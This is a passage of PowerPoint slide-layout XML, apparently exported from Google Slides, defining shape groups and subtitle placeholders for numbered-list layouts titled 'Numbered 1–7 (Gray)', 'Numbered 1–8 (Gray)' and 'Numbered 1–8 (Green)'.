          <p:cNvPr id="250" name="Google Shape;250;p21"/>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2" name="Google Shape;252;p2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53" name="Google Shape;253;p2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54" name="Google Shape;254;p2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55" name="Google Shape;255;p2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56" name="Google Shape;256;p2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57" name="Google Shape;257;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Google Shape;258;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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59" name="Google Shape;259;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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0" name="Google Shape;260;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225" y="12746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1" name="Google Shape;261;p21"/>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2" name="Google Shape;262;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="263" name="Google Shape;263;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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64" name="Google Shape;264;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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5" name="Google Shape;265;p21"/>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6" name="Google Shape;266;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="267" name="Google Shape;267;p21"/>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68" name="Google Shape;268;p21"/>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9" name="Google Shape;269;p21"/>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0" name="Google Shape;270;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="271" name="Google Shape;271;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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72" name="Google Shape;272;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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3" name="Google Shape;273;p21"/>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4" name="Google Shape;274;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="Google Shape;275;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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76" name="Google Shape;276;p21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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7" name="Google Shape;277;p21"/>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8" name="Google Shape;278;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="279" name="Google Shape;279;p21"/>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80" name="Google Shape;280;p21"/>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1" name="Google Shape;281;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1858813"/>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2" name="Google Shape;282;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12250" y="2439925"/>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3" name="Google Shape;283;p21"/>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4" name="Google Shape;284;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="362210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5" name="Google Shape;285;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="42361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21. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 286"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="11616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2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9" name="Google Shape;289;p2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90" name="Google Shape;290;p2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91" name="Google Shape;291;p2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92" name="Google Shape;292;p2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93" name="Google Shape;293;p2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94" name="Google Shape;294;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="295" name="Google Shape;295;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296" name="Google Shape;296;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7" name="Google Shape;297;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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8" name="Google Shape;298;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="16842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9" name="Google Shape;299;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Google Shape;300;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301" name="Google Shape;301;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2" name="Google Shape;302;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125" y="16979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3" name="Google Shape;303;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="220740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4" name="Google Shape;304;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="305" name="Google Shape;305;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306" name="Google Shape;306;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7" name="Google Shape;307;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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8" name="Google Shape;308;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="27300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9" name="Google Shape;309;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="310" name="Google Shape;310;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311" name="Google Shape;311;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2" name="Google Shape;312;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="27437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13" name="Google Shape;313;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="32526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4" name="Google Shape;314;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Google Shape;315;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316" name="Google Shape;316;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7" name="Google Shape;317;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="32663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18" name="Google Shape;318;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="377527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9" name="Google Shape;319;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Google Shape;320;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321" name="Google Shape;321;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2" name="Google Shape;322;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="378897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23" name="Google Shape;323;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="43234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4" name="Google Shape;324;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Google Shape;325;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326" name="Google Shape;326;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7" name="Google Shape;327;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="43371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22. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 328"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p2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30" name="Google Shape;330;p2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31" name="Google Shape;331;p2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32" name="Google Shape;332;p2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333" name="Google Shape;333;p2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34" name="Google Shape;334;p2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35" name="Google Shape;335;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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6" name="Google Shape;336;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="337" name="Google Shape;337;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338" name="Google Shape;338;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9" name="Google Shape;339;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="29967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0" name="Google Shape;340;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="213525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1" name="Google Shape;341;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="342" name="Google Shape;342;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343" name="Google Shape;343;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4" name="Google Shape;344;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="21353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5" name="Google Shape;345;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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6" name="Google Shape;346;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Google Shape;347;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348" name="Google Shape;348;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9" name="Google Shape;349;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="3873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0" name="Google Shape;350;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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1" name="Google Shape;351;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="352" name="Google Shape;352;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353" name="Google Shape;353;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4" name="Google Shape;354;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="34348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5" name="Google Shape;355;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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6" name="Google Shape;356;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="257336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7" name="Google Shape;357;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="358" name="Google Shape;358;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359" name="Google Shape;359;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0" name="Google Shape;360;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12250" y="25735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61" name="Google Shape;361;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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2" name="Google Shape;362;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="363" name="Google Shape;363;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364" name="Google Shape;364;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5" name="Google Shape;365;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="125888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6" name="Google Shape;366;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="367" name="Google Shape;367;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368" name="Google Shape;368;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9" name="Google Shape;369;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="12590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0" name="Google Shape;370;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="169698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1" name="Google Shape;371;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="372" name="Google Shape;372;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373" name="Google Shape;373;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4" name="Google Shape;374;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1697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23. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 375"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p2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7" name="Google Shape;377;p2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78" name="Google Shape;378;p2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79" name="Google Shape;379;p2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380" name="Google Shape;380;p2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81" name="Google Shape;381;p2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2" name="Google Shape;382;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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3" name="Google Shape;383;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="384" name="Google Shape;384;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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385" name="Google Shape;385;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;386;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="3873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7" name="Google Shape;387;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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8" name="Google Shape;388;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="389" name="Google Shape;389;p24"/>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390" name="Google Shape;390;p24"/>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1" name="Google Shape;391;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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92" name="Google Shape;392;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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3" name="Google Shape;393;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="394" name="Google Shape;394;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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395" name="Google Shape;395;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;396;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="29967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97" name="Google Shape;397;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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8" name="Google Shape;398;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="Google Shape;399;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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400" name="Google Shape;400;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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1" name="Google Shape;401;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="34348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2" name="Google Shape;402;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="213525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3" name="Google Shape;403;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="404" name="Google Shape;404;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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405" name="Google Shape;405;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;406;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2135375"/>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7" name="Google Shape;407;p24"/>
